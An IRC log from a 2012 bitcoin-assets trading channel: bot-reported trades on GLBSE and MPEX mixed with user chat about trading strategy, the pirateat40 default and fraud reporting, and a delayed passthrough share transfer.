[F.GIGA.ETF] 2600 @ 0.00063367 = 1.6475 BTC [+] Sep 11 00:11:01 [MPEX] [F.GIGA.ETF] 20972 @ 0.00063457 = 13.3082 BTC [+] Sep 11 00:11:03 [MPEX] [F.GIGA.ETF] 9200 @ 0.00063524 = 5.8442 BTC [+] Sep 11 00:11:04 [MPEX] [F.GIGA.ETF] 6036 @ 0.00063909 = 3.8575 BTC [+] Sep 11 00:11:04 lol Sep 11 00:11:05 [MPEX] [F.GIGA.ETF] 18000 @ 0.00064084 = 11.5351 BTC [+] Sep 11 00:11:05 [MPEX] [F.GIGA.ETF] 24226 @ 0.0006433 = 15.5846 BTC [+] Sep 11 00:11:06 [MPEX] [F.GIGA.ETF] 13900 @ 0.00064896 = 9.0205 BTC [+] Sep 11 00:11:07 [MPEX] [F.GIGA.ETF] 1200 @ 0.00065459 = 0.7855 BTC [+] Sep 11 00:11:08 [MPEX] [F.GIGA.ETF] 500 @ 0.00065494 = 0.3275 BTC [+] Sep 11 00:11:09 [MPEX] [F.GIGA.ETF] 7700 @ 0.00065729 = 5.0611 BTC [+] Sep 11 00:11:10 [MPEX] [F.GIGA.ETF] 3907 @ 0.00066396 = 2.5941 BTC [+] Sep 11 00:11:13 couldn't raise my ask in time Sep 11 00:11:17 on MPEX Sep 11 00:11:47 Nice! 14% in 3 hours of work. Sep 11 00:12:24 haha good for you. Sep 11 00:14:16 [GLBSE] [GIGAMINING] 2 @ 0.6399 = 1.2798 BTC [-] Sep 11 00:16:10 soo Sep 11 00:16:18 anyone else want to open an account Sep 11 00:16:31 [GLBSE] [FOO.PPPPT] 1 @ 0.04500001 BTC [-] Sep 11 00:16:31 [GLBSE] [FOO.PPPPT] 5 @ 0.045 = 0.225 BTC [-] Sep 11 00:16:33 [GLBSE] [FOO.PPPPT] 50 @ 0.04 = 2 BTC [-] Sep 11 00:16:34 [GLBSE] [FOO.PPPPT] 50 @ 0.0375 = 1.875 BTC [-] Sep 11 00:16:35 [GLBSE] [FOO.PPPPT] 152 @ 0.02 = 3.04 BTC [-] Sep 11 00:18:20 [GLBSE] [TYGRR.BOND-P] 34 @ 0.03 = 1.02 BTC [-] Sep 11 00:18:22 [GLBSE] [TYGRR.BOND-P] 300 @ 0.025 = 7.5 BTC [-] Sep 11 00:18:23 [GLBSE] [TYGRR.BOND-P] 200 @ 0.02200001 = 4.4 BTC [-] Sep 11 00:18:24 [GLBSE] [TYGRR.BOND-P] 500 @ 0.02110001 = 10.55 BTC [-] Sep 11 00:18:26 [GLBSE] [TYGRR.BOND-P] 100 @ 0.021 = 2.1 BTC [-] Sep 11 00:18:27 [GLBSE] [TYGRR.BOND-P] 78 @ 0.0111 = 0.8658 BTC [-] Sep 11 00:19:17 [GLBSE] [TYGRR.BOND-A] 5 @ 0.101 = 0.505 BTC [-] Sep 11 00:19:18 [GLBSE] [TYGRR.BOND-A] 6 @ 0.1 = 0.6 BTC [-] Sep 11 00:19:20 [GLBSE] [TYGRR.BOND-A] 41 @ 0.075 = 3.075 BTC [-] Sep 11 00:19:52 http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40&sign=ANY&type=RECV look at that, pirate at 15 Sep 11 00:19:56 pretty soon negative. Sep 11 00:20:30 anyone wanna bet on when it goes under 0 ? Sep 11 00:21:01 [GLBSE] [ZETA-MINING] 1 @ 0.12900103 BTC [-] Sep 11 00:21:38 [GLBSE] [ZETA-MINING] 5 @ 0.12900102 = 0.645 BTC [-] Sep 11 00:21:40 [GLBSE] [ZETA-MINING] 4 @ 0.129001 = 0.516 BTC [-] Sep 11 00:21:40 [GLBSE] [ZETA-MINING] 2 @ 0.129 = 0.258 BTC [-] Sep 11 00:21:41 [GLBSE] [ZETA-MINING] 2 @ 0.127 = 0.254 BTC [-] Sep 11 00:21:43 [GLBSE] [ZETA-MINING] 3 @ 0.126 = 0.378 BTC [-] Sep 11 00:21:44 [GLBSE] [ZETA-MINING] 17 @ 0.1251 = 2.1267 BTC [-] Sep 11 00:23:29 [GLBSE] [BITBOND] 4 @ 0.38611 = 1.5444 BTC [+] Sep 11 00:24:18 [MPEX] [F.GIGA.ETF] 10077 @ 0.000665 = 6.7012 BTC [+] Sep 11 00:24:22 [GLBSE] [BMMO] 3 @ 0.061 = 0.183 BTC [-] Sep 11 00:24:24 [GLBSE] [BMMO] 7 @ 0.060001 = 0.42 BTC [-] Sep 11 00:25:54 [GLBSE] [PUREMINING] 3 @ 0.09400001 = 0.282 BTC [-] Sep 11 00:25:55 [GLBSE] [PUREMINING] 1 @ 0.094 BTC [-] Sep 11 00:25:57 [GLBSE] [PUREMINING] 42 @ 0.0932 = 3.9144 BTC [-] Sep 11 00:25:58 [GLBSE] [PUREMINING] 50 @ 0.0931 = 4.655 BTC [-] Sep 11 00:27:04 [GLBSE] [YABMC] 36 @ 0.1101 = 3.9636 BTC [-] Sep 11 00:27:05 [GLBSE] [YABMC] 28 @ 0.11 = 3.08 BTC [-] Sep 11 00:27:06 [GLBSE] [YABMC] 1 @ 0.1093 BTC [-] Sep 11 00:27:07 [GLBSE] [YABMC] 3 @ 0.1092 = 0.3276 BTC [-] Sep 11 00:27:09 [GLBSE] [YABMC] 10 @ 0.1092 = 1.092 BTC [-] Sep 11 00:27:10 [GLBSE] [YABMC] 16 @ 0.109 = 1.744 BTC [-] Sep 11 00:27:11 [GLBSE] [YABMC] 99 @ 0.1073 = 10.6227 BTC [-] Sep 11 00:27:12 [GLBSE] [YABMC] 15 @ 0.1071 = 1.6065 BTC [-] Sep 11 00:27:13 [GLBSE] [YABMC] 5 @ 0.1021 = 0.5105 BTC [-] Sep 11 00:27:15 [GLBSE] [YABMC] 70 @ 0.1003 = 7.021 BTC [-] Sep 11 00:27:15 [GLBSE] [YABMC] 37 @ 0.1003 = 3.7111 BTC [-] Sep 11 00:28:46 [GLBSE] [GREEN] 1 @ 0.20000001 BTC [-] Sep 11 00:28:47 [GLBSE] [GREEN] 4 @ 0.2 = 0.8 BTC [-] Sep 11 00:28:49 [GLBSE] [GREEN] 10 @ 0.05 = 0.5 BTC [-] Sep 11 00:29:43 yeah usagi an account. Sep 11 00:29:46 ;> Sep 11 00:29:53 [GLBSE] [PUREMINING] 1 @ 0.096 BTC [+] Sep 11 00:29:56 [GLBSE] [BTCASS_BOND_A] 4 @ 0.045 = 0.18 BTC [-] Sep 11 00:30:03 20:16.36 ( kakobrekla ) http://pastebin.com/QVVm2a5Q Sep 11 00:30:38 [GLBSE] [GIGAMINING] 50 @ 0.62 = 31 BTC [-] Sep 11 00:31:55 interactive brokers doesn't scam Sep 11 00:31:59 [GLBSE] [NYAN.B] 1 @ 0.987 BTC [-] Sep 11 00:32:00 and is super cheap Sep 11 00:32:20 [GLBSE] [GSDPT] 5 @ 0.00338 = 0.0169 BTC [-] Sep 11 00:32:22 [GLBSE] [GSDPT] 5 @ 0.00339 = 0.017 BTC [+] Sep 11 00:32:23 [GLBSE] [GSDPT] 40 @ 0.00339 = 0.1356 BTC [+] Sep 11 00:32:31 luckaly this is bitcoin, no banks in that sense Sep 11 00:32:38 [GLBSE] [OBSI.HRPT] 12 @ 0.10159995 = 1.2192 BTC [+] Sep 11 00:33:07 just like pirate did Sep 11 00:33:24 yeah that is stupid. over 25x and you are in the danger zone Sep 11 00:34:11 USD EUR cross, 25x is fine Sep 11 00:34:19 you cannot get wiped out overnight Sep 11 00:34:41 but its a fools game Sep 11 00:35:21 insider knowledge or HFT is the only way to consistently come out ahead doing active trading in major captial markets Sep 11 00:36:25 [GLBSE] [RAREEARTH] 1 @ 0.00954 BTC [-] Sep 11 00:37:19 [GLBSE] [RAREEARTH] 7 @ 0.00955 = 0.0669 BTC [+] Sep 11 00:38:03 If you have the knowledge base and resources and computing power of Renaissance, you can consistetly win. If you are joe 6-pack with your new options account, you are going to blow up your account Sep 11 00:38:59 Stat arb works too, but you are going up against a bunch of smart, motivated people whose job it is to screw you. Sep 11 00:39:43 [GLBSE] [FUTUREFUND] 5 @ 0.000123 = 0.0006 BTC [+] Sep 11 00:40:45 well i know people who lost, people who gained and people still gaining Sep 11 00:40:57 over what timeframe? 10 years? Sep 11 00:41:08 usually morel ike 3-6 months Sep 11 00:41:16 yeah Sep 11 00:42:11 Just take half your money, stick it in some Vanguard Index funds and call me in 10 years. We will see which account has more cash Sep 11 00:42:21 the active or the index Sep 11 00:43:20 but trading is fun Sep 11 00:43:30 thats what my bitcoins are for Sep 11 00:43:42 fun Sep 11 00:43:45 sounds about par for the course. Sep 11 00:44:01 and that 1% chance that everything collapses and bitcoins become worth $1000 each Sep 11 00:46:26 Not investing is also investing Sep 11 00:46:52 The game is not to get rich, but to not die poor. Sep 11 00:50:00 Also its about bragging to your friends about how much better your bitcoin trade was than his weak ass SLV option play or his Romney short on InTrade Sep 11 00:51:46 [GLBSE] [GREEN] 2 @ 0.05 = 0.1 BTC [-] Sep 11 00:51:47 [GLBSE] [GREEN] 1 @ 0.05 BTC [-] Sep 11 00:54:36 that 1% chance is really moar like 99% Sep 11 00:54:55 and that $1000 each is moar like $1000 million. Sep 11 00:55:50 I will feel really bad about my sealswithclubs losses when that happens Sep 11 00:57:17 2010 int'l trade was something like 30trn Sep 11 00:57:43 if 10% of that happens in bitcoin that's a solid 1.5 milion per bitcoin. Sep 11 01:00:03 I would be pretty stoked with .01% of that happening with bitcoin. Sep 11 01:00:31 i'd say by 2050ish a good third of all trade can happen in btc. certainly no good reason not to. Sep 11 01:01:30 twas too much for him. Sep 11 01:05:38 [GLBSE] [OBSI.HRPT] 1 @ 0.10159995 BTC [+] Sep 11 01:07:58 [GLBSE] [YARR] 3 @ 1.00001 = 3 BTC [+] Sep 11 01:11:32 [GLBSE] [CPA] 7 @ 0.03 = 0.21 BTC [-] Sep 11 01:12:00 lol kakobrekla Sep 11 01:22:12 [GLBSE] [SYNERGY] 3 @ 0.14601 = 0.438 BTC [+] Sep 11 01:24:50 [GLBSE] [ASICMINER] 1 @ 0.102 BTC [+] Sep 11 01:25:13 [GLBSE] [BTC-MINING] 4 @ 0.98 = 3.92 BTC [-] Sep 11 01:27:42 [GLBSE] [TEEK.B] 5 @ 0.2001 = 1.0005 BTC [-] Sep 11 01:27:50 [GLBSE] [YARR] 3 @ 1 = 3 BTC [-] Sep 11 01:29:43 [GLBSE] [BMF] 5 @ 0.56999 = 2.85 BTC [-] Sep 11 01:30:55 [GLBSE] [YABMC] 20 @ 0.1147 = 2.294 BTC [+] Sep 11 01:32:23 [GLBSE] [YABMC] 18 @ 0.1148 = 2.0664 BTC [+] Sep 11 01:33:57 [GLBSE] [YARR] 17 @ 1.00001 = 17.0002 BTC [+] Sep 11 01:34:28 [GLBSE] [PUREMINING] 7 @ 0.096 = 0.672 BTC [+] Sep 11 01:36:24 [GLBSE] [PUREMINING] 14 @ 0.0969 = 1.3566 BTC [+] Sep 11 01:39:04 [GLBSE] [OBSI.HRPT] 4 @ 0.10159995 = 0.4064 BTC [+] Sep 11 01:40:24 [GLBSE] [BITBOND] 2 @ 0.3996 = 0.7992 BTC [+] Sep 11 01:44:24 [GLBSE] [GMVT-BOT] 1 @ 0.14 BTC [+] Sep 11 01:49:48 nice Sep 11 01:49:54 [GLBSE] [OBSI.HRPT] 5 @ 0.10159 = 0.508 BTC [-] Sep 11 01:51:36 [GLBSE] [GSDPT] 7 @ 0.00339 = 0.0237 BTC [+] Sep 11 01:53:13 [GLBSE] [GSDPT] 1 @ 0.00339 BTC [+] Sep 11 01:54:53 [GLBSE] [OBSI.HRPT] 1 @ 0.10159995 BTC [+] Sep 11 01:55:30 [GLBSE] [OBSI.HRPT] 7 @ 0.10159995 = 0.7112 BTC [+] Sep 11 01:59:32 [GLBSE] [OBSI.HRPT] 1 @ 0.10159995 BTC [+] Sep 11 02:00:45 [GLBSE] [ASICMINER] 3 @ 0.102 = 0.306 BTC [+] Sep 11 02:02:42 [GLBSE] [MU] 1 @ 0.2697 BTC [+] Sep 11 02:04:26 [GLBSE] [NYAN.B] 10 @ 0.987 = 9.87 BTC [-] Sep 11 02:04:27 [GLBSE] [NYAN.B] 5 @ 0.988 = 4.94 BTC [+] Sep 11 02:04:53 [GLBSE] [NYAN.A] 11 @ 1 = 11 BTC [+] Sep 11 02:05:54 [GLBSE] [CIUCIU.BOND] 10 @ 0.106 = 1.06 BTC [-] Sep 11 02:11:11 [GLBSE] [FOO.PPPPT] 48 @ 0.02 = 0.96 BTC [-] **** BEGIN LOGGING AT Tue Sep 11 08:44:35 2012 Sep 11 09:05:50 [GLBSE] [SS] 3 @ 0.0184 = 0.0552 BTC [+] Sep 11 09:05:51 sooo... apparently godaddy got hacked. Sep 11 09:06:00 unlike mpex, their security sucked. Sep 11 09:16:54 [GLBSE] [PUREMINING] 2 @ 0.0974 = 0.1948 BTC [-] Sep 11 09:16:55 [GLBSE] [PUREMINING] 8 @ 0.0975 = 0.78 BTC [+] Sep 11 09:17:55 [GLBSE] [BFLS.RIG] 3 @ 0.85 = 2.55 BTC [-] Sep 11 09:17:56 [GLBSE] [BFLS.RIG] 4 @ 0.751 = 3.004 BTC [-] Sep 11 09:17:57 [GLBSE] [BFLS.RIG] 1 @ 0.75 BTC [-] Sep 11 09:17:58 [GLBSE] [BFLS.RIG] 6 @ 0.65 = 3.9 BTC [-] Sep 11 09:18:00 [GLBSE] [FPGAMINING] 4 @ 0.824 = 3.296 BTC [+] Sep 11 09:19:02 [GLBSE] [PUREMINING] 5 @ 0.0976 = 0.488 BTC [+] Sep 11 09:23:37 [MPEX] [O.BTCUSD.P100T] 750 @ 0.09301232 = 69.7592 BTC [-] Sep 11 09:24:24 [GLBSE] [JTME] 10 @ 0.85 = 8.5 BTC [+] Sep 11 09:27:52 [GLBSE] [JTME] 1 @ 0.9 BTC [+] Sep 11 09:29:05 [GLBSE] [GMVT-BOT] 1 @ 0.13999 BTC [-] Sep 11 09:29:32 [GLBSE] [DI.BFLSC.FAIL] 20 @ 0.001 = 0.02 BTC [+] Sep 11 09:37:26 [GLBSE] [PIMP] 2 @ 0.136 = 0.272 BTC [+] Sep 11 09:55:24 [GLBSE] [ASICMINER] 1 @ 0.1025 BTC [-] Sep 11 09:55:25 [GLBSE] [ASICMINER] 10 @ 0.102 = 1.02 BTC [-] Sep 11 10:06:21 [GLBSE] [OBSI.HRPT] 3 @ 0.10157 = 0.3047 BTC [+] Sep 11 10:11:39 [GLBSE] [CPA] 500 @ 0.031 = 15.5 BTC [+] Sep 11 10:12:16 [MPEX] [O.BTCUSD.P110T] 100 @ 0.1463467 = 14.6347 BTC [-] Sep 11 10:18:07 [GLBSE] [BMF] 29 @ 0.5 = 14.5 BTC [-] Sep 11 10:20:26 [GLBSE] [TEEK.USD] 20 @ 0.08 = 1.6 BTC [-] Sep 11 10:44:53 [GLBSE] [PPT.A] 300 @ 0.32 = 96 BTC [-] Sep 11 10:52:13 [GLBSE] [TYGRR.BOND-P] 25 @ 0.024 = 0.6 BTC [-] Sep 11 11:02:03 [GLBSE] [OBSI.HRPT] 4 @ 0.10157999 = 0.4063 BTC [+] Sep 11 11:05:34 [GLBSE] [OBSI.HRPT] 30 @ 0.10157999 = 3.0474 BTC [+] Sep 11 11:09:55 [GLBSE] [OBSI.HRPT] 1 @ 0.10157999 BTC [+] Sep 11 11:11:39 [MPEX] [O.BTCUSD.C100T] 200 @ 0.20854983 = 41.71 BTC [+] Sep 11 11:29:56 [GLBSE] [KRAKEN] 10 @ 0.00999999 = 0.1 BTC [-] Sep 11 11:32:24 [GLBSE] [NYAN.B] 13 @ 0.9 = 11.7 BTC [-] Sep 11 11:51:04 [MPEX] [O.BTCUSD.P100T] 293 @ 0.06036978 = 17.6883 BTC [-] Sep 11 11:51:05 [MPEX] [O.BTCUSD.P110T] 8 @ 0.1288813 = 1.0311 BTC [-] Sep 11 11:51:06 [MPEX] [O.BTCUSD.P110T] 4 @ 0.12840128 = 0.5136 BTC [-] Sep 11 11:51:07 [MPEX] [O.BTCUSD.P110T] 2 @ 0.10594218 = 0.2119 BTC [-] Sep 11 11:51:08 [MPEX] [O.BTCUSD.P110T] 986 @ 0.09531182 = 93.9775 BTC [-] Sep 11 11:53:26 [GLBSE] [TYGRR.BOT] 3 @ 0.91 = 2.73 BTC [-] Sep 11 12:02:23 [GLBSE] [BFLS] 5 @ 0.79 = 3.95 BTC [-] Sep 11 12:02:24 [GLBSE] [BFLS] 1 @ 0.783 BTC [-] Sep 11 12:02:25 [GLBSE] [BFLS] 2 @ 0.78 = 1.56 BTC [-] Sep 11 12:02:26 [GLBSE] [BFLS] 10 @ 0.76 = 7.6 BTC [-] Sep 11 12:06:42 [GLBSE] [FUTUREFUND] 3 @ 0.00012682 = 0.0004 BTC [+] Sep 11 12:14:16 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 11 12:14:32 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 11 12:18:32 [GLBSE] [TYGRR.BOND-P] 15 @ 0.024 = 0.36 BTC [-] Sep 11 12:18:34 [GLBSE] [TYGRR.BOND-P] 10 @ 0.02477225 = 0.2477 BTC [+] Sep 11 12:18:35 [GLBSE] [TYGRR.BOND-P] 25 @ 0.025 = 0.625 BTC [+] Sep 11 12:18:36 [GLBSE] [TYGRR.BOND-P] 15 @ 0.0276 = 0.414 BTC [+] Sep 11 12:18:38 [GLBSE] [TYGRR.BOND-P] 25 @ 0.0277 = 0.6925 BTC [+] Sep 11 12:18:38 [GLBSE] [TYGRR.BOND-P] 5 @ 0.0278 = 0.139 BTC [+] Sep 11 12:18:39 [GLBSE] [TYGRR.BOND-P] 5 @ 0.028 = 0.14 BTC [+] Sep 11 12:19:21 [GLBSE] [TYGRR.BOND-P] 73 @ 0.028 = 2.044 BTC [+] Sep 11 12:19:23 [GLBSE] [TYGRR.BOND-P] 27 @ 0.035 = 0.945 BTC [+] Sep 11 12:19:48 [GLBSE] [CPA] 2 @ 0.031 = 0.062 BTC [+] Sep 11 12:21:02 [MPEX] [O.BTCUSD.P200N] 1000 @ 1.12 = 1120 BTC [+] Sep 11 12:25:02 [MPEX] [O.BTCUSD.P200N] 1000 @ 1.12 = 1120 BTC [+] Sep 11 12:27:03 [MPEX] [O.BTCUSD.P200N] 10000 @ 1.12 = 11200 BTC [+] Sep 11 12:29:11 buying up tygrr bond p? Sep 11 12:29:15 odd Sep 11 12:29:35 someone has more faith that i do Sep 11 12:31:02 [MPEX] [O.BTCUSD.P200N] 400 @ 1.12 = 448 BTC [+] Sep 11 12:33:49 [GLBSE] [OBSI.HRPT] 1 @ 0.10157999 BTC [+] Sep 11 12:34:53 [GLBSE] [GIGAMINING] 65 @ 0.62 = 40.3 BTC [+] Sep 11 12:36:17 Chaang-Noi one btc's worth. Sep 11 12:36:38 again, more faith than i have... Sep 11 12:37:02 what are they worth nominally, 1 ? Sep 11 12:37:15 1 btc plus interest Sep 11 12:37:29 so at this point who knows lol Sep 11 12:37:32 35:1 or so implied odds pirate doesn't pay. yeah, i'd say it's more like 1000:1 by now. Sep 11 12:37:32 1.3 maybe Sep 11 12:37:48 yeah but its been almost a month Sep 11 12:37:55 ;;gettrust pirateat40 Sep 11 12:37:56 Trust relationship from user mircea_popescu to user pirateat40: Level 1: -1, Level 2: 35 via 16 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=pirateat40 Sep 11 12:38:02 heh Sep 11 12:43:16 moaning. Sep 11 12:46:41 moaning. Sep 11 12:48:30 hi kako Sep 11 12:48:54 whats up! Sep 11 12:49:16 in bkk, trying to deal with crazyness Sep 11 12:49:22 hi eskimo, what project? Sep 11 12:50:16 brightanarchist is collecting evidancenow Sep 11 12:50:34 i posted a link in that thread Sep 11 12:50:45 no Sep 11 12:51:10 as far as i know no one has talked to priate Sep 11 13:36:11 [GLBSE] [SYNERGY] 2 @ 0.163997 = 0.328 BTC [+] Sep 11 13:36:12 [GLBSE] [SYNERGY] 23 @ 0.163998 = 3.772 BTC [+] Sep 11 13:37:08 [GLBSE] [PUREASIC] 1 @ 0.81 BTC [+] Sep 11 13:38:42 [GLBSE] [SYNERGY] 10 @ 0.163998 = 1.64 BTC [+] Sep 11 13:42:22 [GLBSE] [ASICMINER] 10 @ 0.10389 = 1.0389 BTC [+] Sep 11 13:42:24 [GLBSE] [ASICMINER] 91 @ 0.10399 = 9.4631 BTC [+] Sep 11 13:42:25 [GLBSE] [ASICMINER] 8 @ 0.104 = 0.832 BTC [+] Sep 11 13:42:26 [GLBSE] [ASICMINER] 7 @ 0.104133 = 0.7289 BTC [+] Sep 11 13:42:28 [GLBSE] [ASICMINER] 16 @ 0.1042 = 1.6672 BTC [+] Sep 11 13:44:20 [GLBSE] [OBSI.HRPT] 43 @ 0.10157999 = 4.3679 BTC [+] Sep 11 13:44:22 [GLBSE] [OBSI.HRPT] 100 @ 0.10158 = 10.158 BTC [+] Sep 11 13:44:23 [GLBSE] [OBSI.HRPT] 7 @ 0.1016 = 0.7112 BTC [+] Sep 11 13:44:30 [GLBSE] [PUREMINING] 85 @ 0.0975 = 8.2875 BTC [-] Sep 11 13:47:35 [GLBSE] [OBSI.HRPT] 88 @ 0.1016 = 8.9408 BTC [+] Sep 11 13:47:35 i will not cntact anyone but a lawyer Sep 11 13:47:36 [GLBSE] [PUREASIC] 4 @ 0.81 = 3.24 BTC [+] Sep 11 13:47:40 the lawyer will be doig all that Sep 11 13:47:43 doing Sep 11 13:47:57 and i dont know who when or what... Sep 11 13:48:10 im pretty sure we want to do FBI and firefruad, but who knows... Sep 11 13:48:15 lawyers do what lawyers do Sep 11 13:48:19 [GLBSE] [OBSI.HRPT] 98 @ 0.1017 = 9.9666 BTC [+] Sep 11 13:48:21 [GLBSE] [OBSI.HRPT] 100 @ 0.1017 = 10.17 BTC [+] Sep 11 13:48:22 [GLBSE] [OBSI.HRPT] 2 @ 0.1018 = 0.2036 BTC [+] Sep 11 13:50:45 [GLBSE] [FDBF] 70 @ 0.15 = 10.5 BTC [+] Sep 11 13:51:35 [GLBSE] [OBSI.HRPT] 3 @ 0.1018 = 0.3054 BTC [+] Sep 11 13:57:28 [GLBSE] [BDT] 5 @ 0.981 = 4.905 BTC [-] Sep 11 13:57:42 aha bdt gettin hit Sep 11 13:58:10 AA is late with payment again Sep 11 13:58:13 or something Sep 11 13:58:39 [GLBSE] [BDT] 5 @ 0.98 = 4.9 BTC [-] Sep 11 14:00:03 [GLBSE] [BDT] 4 @ 0.95 = 3.8 BTC [-] Sep 11 14:03:21 [GLBSE] [OBSI.HRPT] 5 @ 0.1018 = 0.509 BTC [+] Sep 11 14:04:22 [GLBSE] [ASICMINER] 30 @ 0.1042 = 3.126 BTC [+] Sep 11 14:07:16 [GLBSE] [NASTY] 3 @ 0.55998999 = 1.68 BTC [-] Sep 11 14:09:05 [GLBSE] [M.ETF] 5 @ 0.12 = 0.6 BTC [-] Sep 11 14:09:33 [GLBSE] [YABMC] 2 @ 0.1147 = 0.2294 BTC [-] Sep 11 14:13:20 [GLBSE] [GIGAMINING] 3 @ 0.62 = 1.86 BTC [+] Sep 11 14:14:21 [GLBSE] [ASICMINER] 2 @ 0.1042 = 0.2084 BTC [+] Sep 11 14:21:03 then the lawyer contacts IC3 Sep 11 14:21:29 meh Sep 11 14:21:31 late to the party Sep 11 14:21:44 [GLBSE] [PUREMINING] 17 @ 0.09755 = 1.6584 BTC [+] Sep 11 14:22:29 [GLBSE] [GIGAMINING] 5 @ 0.62 = 3.1 BTC [+] Sep 11 14:37:03 [MPEX] [F.GIGA.ETF] 19923 @ 0.000665 = 13.2488 BTC [+] Sep 11 14:37:03 [MPEX] [F.GIGA.ETF] 100077 @ 0.000665 = 66.5512 BTC [+] Sep 11 14:38:55 [GLBSE] [BDT] 2 @ 1.045 = 2.09 BTC [+] Sep 11 14:39:45 [GLBSE] [HYDRO.BONDS] 1 @ 1.445 BTC [-] Sep 11 14:49:18 ;;seen DeaDterra Sep 11 14:49:18 DeaDterra was last seen in #bitcoin-assets 15 hours, 49 minutes, and 53 seconds ago: why would someone do that? Sep 11 15:01:51 [GLBSE] [ASICMINER] 2 @ 0.1042 = 0.2084 BTC [+] Sep 11 15:02:07 heh https://bitcointalk.org/index.php?topic=108704.0 Sep 11 15:02:32 in exchange https://bitcointalk.org/index.php?topic=66802.msg1180141#msg1180141 Sep 11 15:04:42 heh Sep 11 15:06:40 so i see pirate has been online off and on trolling, Sep 11 15:08:04 [GLBSE] [PPT.A] 2 @ 0.32 = 0.64 BTC [-] Sep 11 15:08:58 about giga, he should have just never siad he would do upgrades Sep 11 15:09:16 then he would be flowing in the money Sep 11 15:09:45 how you figure ? Sep 11 15:10:31 [GLBSE] [PUREMINING] 15 @ 0.0975 = 1.4625 BTC [-] Sep 11 15:16:57 was Namworld btc-mining ? Sep 11 15:22:29 [GLBSE] [RSM] 2 @ 0.3 = 0.6 BTC [+] Sep 11 15:24:17 [MPEX] [S.DICE] 350000 @ 0.003325 = 1163.75 BTC [-] Sep 11 15:50:01 [MPEX] [F.GIGA.ETF] 11482 @ 0.000665 = 7.6355 BTC [+] Sep 11 15:50:03 [MPEX] [F.GIGA.ETF] 6061 @ 0.00066301 = 4.0185 BTC [-] Sep 11 15:55:03 [GLBSE] [METAL.SILVER] 2 @ 0.115 = 0.23 BTC [+] Sep 11 15:56:26 [GLBSE] [OBSI.HRPT] 9 @ 0.1015 = 0.9135 BTC [-] Sep 11 16:16:14 [GLBSE] [OBSI.HRPT] 2 @ 0.1015 = 0.203 BTC [-] Sep 11 16:18:38 [GLBSE] [FOO.PPPPT] 95 @ 0.0395 = 3.7525 BTC [+] Sep 11 16:18:40 [GLBSE] [FOO.PPPPT] 20 @ 0.04 = 0.8 BTC [+] Sep 11 16:21:26 ;;seen DeaDterra Sep 11 16:21:26 DeaDterra was last seen in #bitcoin-assets 17 hours, 22 minutes, and 2 seconds ago: why would someone do that? Sep 11 16:28:36 Bugpowder: DeaDterra is.... Sep 11 16:28:39 dead! Sep 11 16:33:06 If GIGAMINING goes bust, I don't even... Sep 11 16:33:33 hm Sep 11 16:33:44 giga lost coins with pirate now he needs more for asic Sep 11 16:33:47 ;> Sep 11 16:34:25 I find it hilarious people put hundreds of thousands with him Sep 11 16:34:36 all he got was 30something k iirc. Sep 11 16:34:50 be happy Sep 11 16:35:24 And that's why I will buy some. Sep 11 16:35:25 DeaDterra is selling my GBLSE S.DICE passthru shares Sep 11 16:35:47 prior to sending me the S.DICE on MPEx Sep 11 16:35:53 i'm not married to pirate why he takes half Sep 11 16:35:55 I lol'd Sep 11 16:35:57 so hard Sep 11 16:38:00 [GLBSE] [MMM] 1 @ 0.91 BTC [-] Sep 11 16:38:01 [GLBSE] [MMM] 2 @ 0.9 = 1.8 BTC [-] Sep 11 16:38:17 which makes me wonder... Why would he need to do that? Shouldn't he have the S.DICE shares to cover the GSDPT shares? Sep 11 16:39:45 Which makes me wonder if GSDPT is merely a method for extracting more coins from people, either to pay off the Gamma Pirate PPT, or just for his own pocket. Sep 11 16:40:00 I can tell you it's not Sep 11 16:40:36 funds used from shares of GSDPT being sold are used to buy shares on mpex Sep 11 16:41:11 when you buy GSDPT you are giving BTC to DeaDTerra to use to then buy the equivalent amount on mpex Sep 11 16:41:34 I am trying to do a transfer 1:1 Sep 11 16:42:03 I have shares of GSDPT, I gave them to DeaDTerra to exchange to S.DICE on my MPEx account Sep 11 16:42:35 Now they are up for sale on GBLSE, but no new S.DICE in my MPEx account Sep 11 16:42:44 20 hour delay Sep 11 16:43:10 GLBSE has the record Sep 11 16:43:25 and the shares are currently up for sale at .003999 Sep 11 16:44:28 public record of that as well Sep 11 16:45:07 twitter AFAIK Sep 11 16:45:13 lul Sep 11 16:45:38 Need to link to account fingerprint Sep 11 16:45:42 for it to be worth it Sep 11 16:46:15 meh Sep 11 16:46:31 thats an interesting question Sep 11 16:46:45 how can we prove asset issuers use BTC for the intended purposes? Sep 11 16:47:04 or get proof of? Sep 11 16:47:38 ok Sep 11 16:49:00 [GLBSE] [GIGAMINING] 10 @ 0.62 = 6.2 BTC [+] Sep 11 16:49:24 What do you think my options are. Will GLBSE claw back a transfer? The shares have not been sold into coin yet. Is deadterra just slow, or is he blowing up from the Gamma ppt and having a liquidity crunch? Any ideas/ Sep 11 16:49:56 [GLBSE] [SYNERGY] 20 @ 0.163997 = 3.2799 BTC [-] Sep 11 16:49:58 [GLBSE] [SYNERGY] 43 @ 0.163998 = 7.0519 BTC [+] Sep 11 16:50:04 It's not an order, it was an asset transfer Sep 11 16:50:09 Bugpowder: Terra is slow AFAIK Sep 11 16:50:40 well we're adding tags later today Sep 11 16:50:45 and we have the 3 separate markets Sep 11 16:50:59 where currently everything is in the pink market Sep 11 16:51:37 dont say it EskimoBob Sep 11 16:51:39 do not say it Sep 11 16:51:43 I SAID DONT SA IT Sep 11 16:52:02 usagi: well heres the problem Sep 11 16:52:10 they're not bonds in btc Sep 11 16:52:17 they've made mhash a currency of its own Sep 11 16:52:19 they are mhash bonds Sep 11 16:53:01 EskimoBob: no, thats the thing Sep 11 16:53:10 you know why 1mhs bond prices crashed? Sep 11 16:53:18 people factored in post-asic difficulty Sep 11 16:53:41 Bugpowder deadterra is usually around once a day Sep 11 16:53:51 mhash bonds are in the currency of mhash, but are bought and sold in btc and pay in btc Sep 11 16:54:09 so we're watching exactly what should have happened Sep 11 16:54:14 mhash are now worth a lot less Sep 11 16:54:33 Just got a message from DeaDterra re: transfer Sep 11 16:54:37 but yea, i can confirm what nefario said, the guy holds in excess of 400k s.dice so he's good Sep 11 16:54:37 usagi: thats just the other end Sep 11 16:54:41 says it will be done in an hour Sep 11 16:54:50 now of course, *cough* I bought some of those cheap bonds Sep 11 16:54:54 ya, well... some people work/raise 